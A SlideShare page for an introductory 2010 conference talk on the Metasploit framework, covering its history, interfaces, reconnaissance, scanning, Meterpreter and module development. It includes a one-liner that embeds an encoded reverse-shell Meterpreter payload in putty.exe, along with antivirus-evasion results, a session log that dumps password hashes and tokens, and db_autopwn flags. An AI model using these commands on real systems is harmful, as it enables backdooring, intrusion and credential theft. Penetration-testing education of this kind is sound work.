SlideShare una empresa de Scribd logo
1 de 31
Free, Powerful, Flexible
Warning




Make sure you have written permission to use apps
  like Metasploit on systems that are not yours!
Metasploit is...
History
• Started June 2003 against anti-disclosure
• 1.0 written in Perl and had 11 exploits
• 3.0 complete rewrite in Ruby
• 3.1 Released under the BSD license
• Acquired by Rapid7 on Oct 21, 2009
• 3.4.2 (svn) has 590 exploits, 305 auxiliary
  modules, 225 payloads and 27 encoders
Getting Metasploit
•   Windows, Linux and UNIX packages
    •   http://www.metasploit.com/framework/download/



•   Check out directly from Subversion repository
    •   svn co https://www.metasploit.com/svn/framework3/trunk/



•   Ruby 1.9.2 - current supported version
Interfaces available

• msfcli - Metasploit one-liners from the shell
• msfconsole - Text based interactive console
• msfgui - Java GUI
• msfweb - web interface   (not currently supported)


• msfrpcd - XMLRPC server
External Applications
• nmap
• Maltego
• Nessus
• Nexpose
• Ratproxy
• Karma
Capabilities
• Reconnaissance
• Scanning
• Exploit
• Control and Pivot
• Encode payloads
• Develop Exploits
Recon
•   Recon modules found in modules/auxiliary/gather/

•   DNS Enumeration

•   Email Address Collection

•   Username Generation
    •   http://sourceforge.net/projects/reconnoiter/files/


•   Shodan
    •   http://www.sploitlab.com/files/shodan_enumerator.rb
Scanning
Database setup
nmap scanning
Loading into utos-msf
Exploitation
• Network services - SMTP, FTP, SNMP,
  HTTP
• Client applications - Browsers, PDFs, EXE
• Wireless - MITM
• Web applications
• Database systems
db_autopwn
• Load up a vulnerability scan
Score!
Control and Pivot

• Meterpreter - Windows
• Meterpretux - Linux/POSIX
• Machterpreter - OS X
• Meterpreter in PHP
More Meterpreter
• Act as a router for the Metasploit
• Execute scripted actions
• Download password hashes
• Migrate between processes
• Key logging, screen capture, edit registry
• 54 different scripts in scripts/meterpreter
Meterpreter Commands
commands continued...
networking
system
userland
privileged commands
Meterpreter Scripts
meterpreter > run winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 192.168.1.6:1042...
[*] Saving general report to /Users/jwood/.msf3/logs/scripts/winenum/XP-UTOS-MSF_20101007.2111/XP-UTOS-
MSF_20101007.2111.txt
[*] Output of each individual command is saved to /Users/jwood/.msf3/logs/scripts/winenum/XP-UTOS-MSF_20101007.2111
[*] Checking if XP-UTOS-MSF is a Virtual Machine ........
[*] This is a VMWare virtual Machine
[*] UAC is Disabled
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -vb
[*] running command netstat -ns
[*] running command net accounts
.....snip....
[*] Extracting software list from registry
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!
Backdooring Files
• PDF, EXE, Audio, Flash and more
•   ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.106
    LPORT=8080 R | ./msfencode -t exe -x /tmp/putty.exe -o /tmp/
    putty_backdoored.exe -e x86/shikata_ga_nai -c 5


• Tested files on VirusTotal.com
 • PDF - 20 of 42 AV apps detected
 • EXE - 2 of 42 AV apps detected
Developing a Module
• Got something you want to exploit?
For example...
Resources

• IRC: freenode.net, #metasploit
• metasploit.com
•   http://www.offensive-security.com/metasploit-unleashed/

• Securitytube.net
•   Slides at http://jwnetworkconsulting.com/downloads/utos-msf-2010.pdf
Questions?

• jwnetworkconsulting.com
• Email: tadaka__AT__gmail.com
• IRC: tadaka
• Twitter: Jason_Wood

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Linux mint
Linux mint Linux mint
Linux mint
 
Introduce to linux
Introduce to linuxIntroduce to linux
Introduce to linux
 
What is Ubuntu - presentation
What is Ubuntu - presentationWhat is Ubuntu - presentation
What is Ubuntu - presentation
 
Introduction to Linux for Windows Users
Introduction to Linux for Windows UsersIntroduction to Linux for Windows Users
Introduction to Linux for Windows Users
 
History of ubuntu
History of ubuntuHistory of ubuntu
History of ubuntu
 
Ubuntu-Overview
Ubuntu-OverviewUbuntu-Overview
Ubuntu-Overview
 
How ubuntu works???
How ubuntu works???How ubuntu works???
How ubuntu works???
 
Ubuntu - The History
Ubuntu - The HistoryUbuntu - The History
Ubuntu - The History
 
Ubuntu desktop
Ubuntu desktopUbuntu desktop
Ubuntu desktop
 
Ubuntu – Linux Useful Commands
Ubuntu – Linux Useful CommandsUbuntu – Linux Useful Commands
Ubuntu – Linux Useful Commands
 
Ubuntu
UbuntuUbuntu
Ubuntu
 
Ubuntu
UbuntuUbuntu
Ubuntu
 
Introduction to Ubantu
Introduction to UbantuIntroduction to Ubantu
Introduction to Ubantu
 
Linux Presentation
Linux PresentationLinux Presentation
Linux Presentation
 
Introduction to Ubuntu
Introduction to UbuntuIntroduction to Ubuntu
Introduction to Ubuntu
 
Ubuntu an absolute beginners guide
Ubuntu an absolute beginners guideUbuntu an absolute beginners guide
Ubuntu an absolute beginners guide
 
Before begining linux
Before begining linuxBefore begining linux
Before begining linux
 
Unix ppt
Unix pptUnix ppt
Unix ppt
 
Linux Training Workshop
Linux Training WorkshopLinux Training Workshop
Linux Training Workshop
 
UNIX introduction
UNIX introductionUNIX introduction
UNIX introduction
 

Destacado (11)

Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
Wiretapping
WiretappingWiretapping
Wiretapping
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Information gath
Information gathInformation gath
Information gath
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Social engineering
Social engineering Social engineering
Social engineering
 
Social engineering presentation
Social engineering presentationSocial engineering presentation
Social engineering presentation
 
Metasploit
MetasploitMetasploit
Metasploit
 
Packet Sniffing
Packet SniffingPacket Sniffing
Packet Sniffing
 
Sniffer
SnifferSniffer
Sniffer
 

Similar a Metasploit @ 2010 Utah Open Source Conference

01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)ClubHack
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Frameworkegypt
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfRohitGautam261127
 
Bridging the Semantic Gap in Virtualized Environment
Bridging the Semantic Gap in Virtualized EnvironmentBridging the Semantic Gap in Virtualized Environment
Bridging the Semantic Gap in Virtualized EnvironmentAndy Lee
 
Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBakry3
 
Mr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engMr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engFFRI, Inc.
 
Linux beginner's Workshop
Linux beginner's WorkshopLinux beginner's Workshop
Linux beginner's Workshopfutureshocked
 
Introduction to Linux Kernel
Introduction to Linux KernelIntroduction to Linux Kernel
Introduction to Linux KernelStryker King
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with VolatlityOMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with VolatlityAndrew Case
 
Linux for beginners
Linux for beginnersLinux for beginners
Linux for beginnersNitesh Nayal
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
 

Similar a Metasploit @ 2010 Utah Open Source Conference (20)

01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
Powering up on power shell avengercon - 2018
Powering up on power shell   avengercon - 2018Powering up on power shell   avengercon - 2018
Powering up on power shell avengercon - 2018
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
Bridging the Semantic Gap in Virtualized Environment
Bridging the Semantic Gap in Virtualized EnvironmentBridging the Semantic Gap in Virtualized Environment
Bridging the Semantic Gap in Virtualized Environment
 
Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slides
 
Wissbi osdc pdf
Wissbi osdc pdfWissbi osdc pdf
Wissbi osdc pdf
 
Mr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engMr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_eng
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
Linux beginner's Workshop
Linux beginner's WorkshopLinux beginner's Workshop
Linux beginner's Workshop
 
Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell  - BSides Greenville 2019Powering up on PowerShell  - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019
 
Metasploit
MetasploitMetasploit
Metasploit
 
Introduction to Linux Kernel
Introduction to Linux KernelIntroduction to Linux Kernel
Introduction to Linux Kernel
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with VolatlityOMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
 
Linux for beginners
Linux for beginnersLinux for beginners
Linux for beginners
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 

Metasploit @ 2010 Utah Open Source Conference

  • 2. Warning Make sure you have written permission to use apps like Metasploit on systems that are not yours!
  • 4. History • Started June 2003 against anti-disclosure • 1.0 written in Perl and had 11 exploits • 3.0 complete rewrite in Ruby • 3.1 Released under the BSD license • Acquired by Rapid7 on Oct 21, 2009 • 3.4.2 (svn) has 590 exploits, 305 auxiliary modules, 225 payloads and 27 encoders
  • 5. Getting Metasploit • Windows, Linux and UNIX packages • http://www.metasploit.com/framework/download/ • Check out directly from Subversion repository • svn co https://www.metasploit.com/svn/framework3/trunk/ • Ruby 1.9.2 - current supported version
  • 6. Interfaces available • msfcli - Metasploit one-liners from the shell • msfconsole - Text based interactive console • msfgui - Java GUI • msfweb - web interface (not currently supported) • msfrpcd - XMLRPC server
  • 7. External Applications • nmap • Maltego • Nessus • Nexpose • Ratproxy • Karma
  • 8. Capabilities • Reconnaissance • Scanning • Exploit • Control and Pivot • Encode payloads • Develop Exploits
  • 9. Recon • Recon modules found in modules/auxiliary/gather/ • DNS Enumeration • Email Address Collection • Username Generation • http://sourceforge.net/projects/reconnoiter/files/ • Shodan • http://www.sploitlab.com/files/shodan_enumerator.rb
  • 14. Exploitation • Network services - SMTP, FTP, SNMP, HTTP • Client applications - Browsers, PDFs, EXE • Wireless - MITM • Web applications • Database systems
  • 15. db_autopwn • Load up a vulnerability scan
  • 16.
  • 18. Control and Pivot • Meterpreter - Windows • Meterpretux - Linux/POSIX • Machterpreter - OS X • Meterpreter in PHP
  • 19. More Meterpreter • Act as a router for the Metasploit • Execute scripted actions • Download password hashes • Migrate between processes • Key logging, screen capture, edit registry • 54 different scripts in scripts/meterpreter
  • 26. Meterpreter Scripts meterpreter > run winenum [*] Running Windows Local Enumerion Meterpreter Script [*] New session on 192.168.1.6:1042... [*] Saving general report to /Users/jwood/.msf3/logs/scripts/winenum/XP-UTOS-MSF_20101007.2111/XP-UTOS- MSF_20101007.2111.txt [*] Output of each individual command is saved to /Users/jwood/.msf3/logs/scripts/winenum/XP-UTOS-MSF_20101007.2111 [*] Checking if XP-UTOS-MSF is a Virtual Machine ........ [*] This is a VMWare virtual Machine [*] UAC is Disabled [*] Running Command List ... [*] running command cmd.exe /c set [*] running command arp -a [*] running command ipconfig /all [*] running command ipconfig /displaydns [*] running command route print [*] running command net view [*] running command netstat -vb [*] running command netstat -ns [*] running command net accounts .....snip.... [*] Extracting software list from registry [*] Dumping password hashes... [*] Hashes Dumped [*] Getting Tokens... [*] All tokens have been processed [*] Done!
  • 27. Backdooring Files • PDF, EXE, Audio, Flash and more • ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=8080 R | ./msfencode -t exe -x /tmp/putty.exe -o /tmp/ putty_backdoored.exe -e x86/shikata_ga_nai -c 5 • Tested files on VirusTotal.com • PDF - 20 of 42 AV apps detected • EXE - 2 of 42 AV apps detected
  • 28. Developing a Module • Got something you want to exploit?
  • 30. Resources • IRC: freenode.net, #metasploit • metasploit.com • http://www.offensive-security.com/metasploit-unleashed/ • Securitytube.net • Slides at http://jwnetworkconsulting.com/downloads/utos-msf-2010.pdf
  • 31. Questions? • jwnetworkconsulting.com • Email: tadaka__AT__gmail.com • IRC: tadaka • Twitter: Jason_Wood

Notas del editor

  1. -t = show all matching exploits -x = select modules based on vulnerability -p = select modules based on ports -e = launch exploits against all matched targets -r = use a reverse connect shell